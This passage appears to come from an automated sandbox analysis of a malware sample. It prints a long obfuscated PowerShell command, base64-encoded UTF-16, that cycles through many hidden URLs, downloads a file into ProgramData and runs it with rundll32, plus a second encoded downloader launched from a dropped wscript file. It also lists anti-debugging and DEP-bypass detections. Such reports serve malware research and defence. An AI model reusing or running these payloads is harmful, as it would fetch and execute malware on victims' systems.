QQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWgBRAEIAdQBBAEgAUQBBAFoAUQBCAHkAQQBIAEEAQQBjAGcAQgBwAEEASABNAEEAWgBRAEIAegBBAEEAPQA9AHIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAYgB3AEIAdABBAEcAOABBAFoAUQBCAHkAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAeQBBAEcAVQBBAGQAZwBCAHAAQQBHAFUAQQBkAHcAQQA9ACIAOwAkAGEAcABvAHMAdAByAG8AcABoAGkAegBlAGQAQwBvAG0AcABsAGUAeABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEgASQBBAGIAdwBCAHcAQQBIAEkAQQBhAFEAQgBsAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFoAUQBCAHoAQQBGAE0AQQBjAFEAQgAxAEEARwBFAEEAYgBRAEIAbABBAEcAdwBBAGIAQQBCAGgAQQBIAFEAQQBaAFEAQQB1AEEARwBjAEEAYgB3AEIAcwBBAEcAWQBBAEIATgBVAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBRAEEAdQBBAEQARQBBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABFAEEATABnAEEAeABBAEQARQBBAE4AZwBBAD0AIgA7ACQAcABlAHIAagB1AHIAZQBkAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATwBBAEEAMABBAEMANABBAE0AUQBBADMAQQBEAEEAQQAiADsAJABUAG8AbwBtAGwAeQBNAGUAYwBoAGEAbgBvAHIAZQBjAGUAcAB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGIAdwBCAHQAQQBHAGsAQQBkAEEAQgBoAEEARwBRAEEAYQBnAEIAcABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAMABBAEgAVQBBAGMAZwBCAGgAQQBHAHcAQQBMAGcAQgBoAEEARwBNAEEAWQBRAEIAawBBAEcAVQBBAGIAUQBCADUAQQBBAD0APQB2AG0AYwBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBPAEEAQQB1AEEARABVAEEATgBRAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBOAHcAQQA0AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBRAEIAWABBAEcAOABBAGMAZwBCAGsAQQBHAEkAQQBkAFEAQgBwAEEARwB3AEEAWgBBAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAEkAQQBkAFEAQgBvAEEASABJAEEAIgA7ACQAdAByAGkAYwBrAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATgBnAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA0AEEARABVAEEATABnAEEAMwBBAEQASQBBAEwAdwBCAHoAQQBEAEUAQQBlAEEAQgB1AEEAQwA4AEEAWgBnAEEAegBBAEUAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQAawBBAE8AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATgBBAEEANABBAEMAOABBAGIAZwBCAEkAQQBDADgAQQBSAFEAQgBRAEEAQQA9AD0AdQBKAGkAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAHAAQQBGAG8AQQBkAHcAQgBVAEEARQBZAEEAYwBBAEIAVwBBAEgAQQBBAFIAdwBBAHkAQQBEAEEAQQBWAEEAQQA9AHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgAawBBAGEAQQBCAHgAQQBGAGMAQQBOAHcAQgBqAEEARQBZAEEAUQBRAEIASABBAEQAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgBnAEEANABBAEMAOABBAE8AUQBCAEQAQQBHADAAQQBPAFEAQgBGAEEARgBjAEEATAB3AEIARgBBAEcAdwBBAFEAdwBCAHMAQQBHAHcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQAgAGkAbgAgACQAdAByAGkAYwBrAGwAZQBkACAALQBzAHAAbABpAHQAIAAiAHUASgBpAGEAIgApACAAewAkAGMAbwBwAGgAbwB1AHMAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAHQAQQBHADgAQQBjAGcAQgBrAEEARQA0AEEAYgB3AEIAdQBBAEcAVQBBAGUAQQBCADAAQQBHAFUAQQBjAGcAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQBEAHEAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBZAFEAQgBrAEEARwB3AEEAYQBRAEIAbgBBAEcAZwBBAGQAQQBCAEMAQQBIAFUAQQBiAEEAQgBzAEEARwBnAEEAWgBRAEIAaABBAEcAUQBBAFoAUQBCAGsAQQBHAHcAQQBlAFEAQQB1AEEASABJAEEAWgBRAEIAawBBAEEAPQA9AEQAcQBYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBZAFEAQgAwAEEARwA4AEEAYwBBAEIAbwBBAEcAOABBAGMAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEASABZAEEAWgBRAEIAdQBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9ACIAOwAkAG4AbwBuAGMAbwBuAHYAZQByAHQAaQBiAGwAZQBuAGUAcwBzAEYAaQBkAGkAYwBpAG4AYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEARwA4AEEAYQBRAEIAcwBBAEcAVQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEARgBBAEEAYwBnAEIAbABBAEcATQBBAFkAUQBCAHUAQQBHAE0AQQBaAFEAQgB5AEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEEAPQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AQQBBADEAQQBDADQAQQBOAHcAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE8AQQBBAHcAQQBBAD0APQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAGcAQQAxAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBADIAQQBEAE0AQQAiADsAJAB1AG4AbQBlAGEAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAGgAQQBHADQAQQBhAFEAQgBqAEEARQBnAEEAYgB3AEIAdgBBAEgASQBBAFkAUQBCAG8AQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcABBAEgASQBBAFoAUQBCAGoAQQBIAFEAQQBiAHcAQgB5AEEASABrAEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBIAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAcABBAEcAOABBAGMAdwBCAEIAQQBHAGMAQQBZAFEAQgB5AEEARwBrAEEAWQB3AEEAdQBBAEcAcwBBAGEAUQBCADAAQQBHAE0AQQBhAEEAQgBsAEEARwA0AEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFUAQQBZAHcAQgBqAEEARwB3AEEAWgBRAEIAegBBAEcAawBBAGIAdwBCAHMAQQBHADgAQQBaAHcAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMANABBAGIAUQBCADQAQQBBAD0APQBnAHcAaQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGEAUQBCAHMAQQBHAEUAQQBhAHcAQgBoAEEAQwA0AEEAYgBRAEIAbABBAEcANABBACIAOwB0AHIAeQAgAHsAJABTAHQAZQBtAHMAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAZQBRAEIAbABBAEcAdwBBAGEAUQBCAHUAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFYAQQBHADQAQQBZAFEAQgBuAEEASABJAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBZAGcAQgBsAEEASABRAEEAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAeQBBAEMANABBAE0AUQBBAHcAQQBEAGsAQQBMAGcAQQB4AEEARABJAEEATgB3AEEAPQBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEgASQBBAGQAUQBCAGsAQQBHAGMAQQBhAFEAQgB1AEEARwBjAEEAVgBRAEIAdQBBAEcAVQBBAGIAZwBCADEAQQBHADAAQQBaAFEAQgB5AEEARwBFAEEAZABBAEIAcABBAEgAWQBBAFoAUQBBAHUAQQBHAG8AQQBjAEEAQQA9AHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBZAEEAYQBRAEIAaABBAEcAUQBBAGQAUQBCAGoAQQBIAFEAQQBjAHcAQQB1AEEASABRAEEAYgB3AEIAMQBBAEgASQBBAGMAdwBBAD0AIgA7ACQAVAB1AHIAdABvAHMAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAdwBCADAAQQBHAGcAQQBaAFEAQgB2AEEASABJAEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGoAQQBHADgAQQBTAGgARgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYgBBAEIAbABBAEUATQBBAGIAdwBCAGgAQQBHAFEAQQBhAGcAQgAxAEEASABRAEEAWQBRAEIAdQBBAEgAUQBBAEwAZwBCAGkAQQBHAEUAQQBjAGcAQgBuAEEARwBFAEEAYQBRAEIAdQBBAEgATQBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATgB3AEEAdQBBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMQBBAEQAYwBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYQBRAEIAeQBBAEcANABBAFkAUQBCAHMAQQBGAGMAQQBhAFEAQgB5AEEARwBVAEEAYQBBAEIAaABBAEcAawBBAGMAZwBBAHUAQQBIAFUAQQBhAHcAQQA9ACIAOwAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAHAAaQB0AHQAbABlAHMAdABhAGYAZgBIAHkAcABlAHIAcwB1AGIAdABsAGUALgBoAGUAeABhAG0AZQByAG8AdQBzAEkAZABpAG8AdABpAHMAZQA7ACQASABlAG4AbQBvAGwAZAB5AE0AdQBnAGcAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAdwBCADUAQQBHAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEgAUQBBAGMAZwBCADUAQQBFAFUAQQBZAGcAQgBqAEEARwBFAEEAYwB3AEIAagBBAEMANABBAGQAZwBCAGoAQQBBAD0APQA9AEsASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAGsAQQBMAGcAQQAyAEEARABNAEEATABnAEEANQBBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAEEAQQA9ACIAOwAkAGgAbwBvAGQAdwBpAG4AawBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBRAEEAPQBFAHoAVwB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAMwBBAEQARQBBAEwAZwBBADUAQQBEAEkAQQAiADsAJABCAGEAegBhAGEAcgBOAG8AbgBlAHgAYQBnAGcAZQByAGEAdABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcANABBAGIAdwBCAHUAQQBIAEkAQQBZAFEAQgBrAEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBHADAAQQBaAFEAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQA0AEEARABFAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAGkAdAB0AGwAZQBzAHQAYQBmAGYASAB5AHAAZQByAHMAdQBiAHQAbABlAC4AaABlAHgAYQBtAGUAcgBvAHUAcwBJAGQAaQBvAHQAaQBzAGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADYAMgA3ADAAOQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEgATQBBAGMAQQBCAHAAQQBIAFEAQQBkAEEAQgBzAEEARwBVAEEAYwB3AEIAMABBAEcARQBBAFoAZwBCAG0AQQBFAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAegBBAEgAVQBBAFkAZwBCADAAQQBHAHcAQQBaAFEAQQB1AEEARwBnAEEAWgBRAEIANABBAEcARQBBAGIAUQBCAGwAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEAUwBRAEIAawBBAEcAawBBAGIAdwBCADAAQQBHAGsAQQBjAHcAQgBsAEEAQwB3AEEAZABnAEIAcABBAEgAQQBBAGMAdwBBADcAQQBFADAAQQBTAFEAQgBVAEEARQB3AEEAYQBRAEIAagBBAEcAVQBBAGIAZwBCAHoAQQBHAFUAQQAiADsAJABDAG8AbQBiAGUAcgBzAFcAYQByAGQAZQBuAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcARQBBAGQAQQBCAGwAQQBIAGMAQQBZAFEAQgA1AEEARwAwAEEAWQBRAEIAdQBBAEUAUQBBAFoAUQBCAGgAQQBHAFkAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEgAUQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBzAEEAWgBRAEIAMABBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBSAFEAQgB0AEEARwA4AEEAWgBBAEIAcABBAEcANABBAGMAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBnAEEAIgA7ACQAYwBhAHIAYQBiAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcAawBBAGIAUQBCAGgAQQBHADQAQQBkAEEAQgB2AEEASABBAEEAZABRAEIAegBBAEYAUQBBAGIAdwBCAHkAQQBIAEkAQQBaAFEAQgBtAEEASABrAEEATABnAEIAdABBAEcAOABBAFoAQQBCAGgAQQBBAD0APQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFcAQQBHAGsAQQBjAHcAQgBqAEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCADAAQQBHADgAQQBjAGcAQQB1AEEARwA0AEEAWQBRAEIAMgBBAEgAawBBAHgAaABLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AZwBBAHgAQQBEAFEAQQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAdwBBAEgASQBBAGIAdwBCAHcAQQBHAGcAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEcAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBACIAOwAkAFMAeQBuAGEAbgBnAGkAYQBsAEMAbwByAGIAZQBsAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGsAQQBNAFEAQQB1AEEARABnAEEATQBnAEEAdQBBAEQASQBBAE0AZwBBADEAQQBBAD0APQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFkAQQBaAFEAQgB5AEEARwBJAEEAWQBRAEIAcwBBAEcAawBBAGMAdwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAUwBBAEIAbABBAEgASQBBAFoAQQBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAawBBAGQAQQBCAGwAQQBHAFEAQQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBsAEEARwA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgBrAEEAQwA0AEEAYQB3AEIAcABBAEgAUQBBAFkAdwBCAG8AQQBHAFUAQQBiAGcAQQA9AEsARABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBRAEEAeABBAEQARQBBAEwAZwBBADAAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAEwAdQBuAGMAaABlAG8AbgBlAHQAdABlAHMATQBlAG4AdABoAGEAYwBlAGEAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAUQBBAGMAZwBCADEAQQBHAFEAQQBaAHcAQgBwAEEARwA0AEEAWgB3AEIAVgBBAEcANABBAFoAUQBCAHUAQQBIAFUAQQBiAFEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGQAZwBCAGwAQQBDADQAQQBjAGcAQgB2AEEARwBNAEEAYQB3AEIAegBBAEEAPQA9ACIAOwAkAGgAZQBuAGMAaABtAGUAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AEYAVwBNAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB4AEEARABVAEEATABnAEEAeQBBAEQAUQBBAE8AUQBBAD0ARgBXAE0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEIAQQBIAE0AQQBkAHcAQgBoAEEARwBrAEEAYgBBAEIAVABBAEgAVQBBAFkAZwBCAGgAQQBIAFUAQQBaAEEAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAOABBACIAOwB9AH0AJABpAGcAbgBhAHQAaQB1AHMARgBsAHUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBPAFEAQQB1AEEARABnAEEATgB3AEEAdQBBAEQARQBBAE4AUQBBADQAQQBDADQAQQBPAEEAQQA1AEEAQQA9AD0AdwBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcATQBBAGMAZwBCAHYAQQBHAEkAQQBhAFEAQgB6AEEAQwA0AEEAYgBRAEIAaQBBAEcARQBBACIAOwA=" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 24, 2023, 11:04 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\Teenagers.js" CultchPatrilineal Unrowdy Misproposal pseudobchia
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\Teenagers.js" CultchPatrilineal Unrowdy Misproposal pseudobchia
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABwAGEAbABtAGUAbABsAG8AaQBkAFMAZQBuAHMAYQB0AGkAbwBuAGkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAawBBAGIAZwBCAGwAQQBIAGcAQQBiAHcAQgB5AEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBKAEEASABNAEEAYgB3AEIAeABBAEgAVQBBAGEAUQBCAHUAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQBKAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAaQBBAEgASQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQgBUAEEARwA0AEEAYgB3AEIAaQBBAEcASQBBAGEAUQBCAHoAQQBHAGcAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEcATQBBAFkAUQBCAHQAQQBHAFUAQQBjAGcAQgBoAEEAQQA9AD0ASgBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE8AQQBBAHUAQQBEAEkAQQBNAGcAQQB5AEEAQwA0AEEATgBRAEEAdwBBAEMANABBAE0AUQBBADAAQQBEAFUAQQAiADsAJABsAGkAcQB1AGUAZgBpAGUAcwBVAG4AdwBhAGQAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgB3AEEAegBBAEMANABBAE0AUQBBAHgAQQBEAGcAQQBMAGcAQQA0AEEARABRAEEAVgBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBBAEEAdQBBAEQARQBBAE4AdwBBADAAQQBDADQAQQBOAHcAQQA0AEEAQwA0AEEATgB3AEEANQBBAEEAPQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAFoAUQBCADAAQQBIAFEAQQBhAFEAQgB0AEEARwBFAEEATABnAEIAagBBAEcARQBBAGMAdwBCAHAAQQBHADQAQQBiAHcAQQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAFEAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAdwBBAEMANABBAE0AUQBBADEAQQBEAGsAQQAiADsAJABzAHQAbwBjAG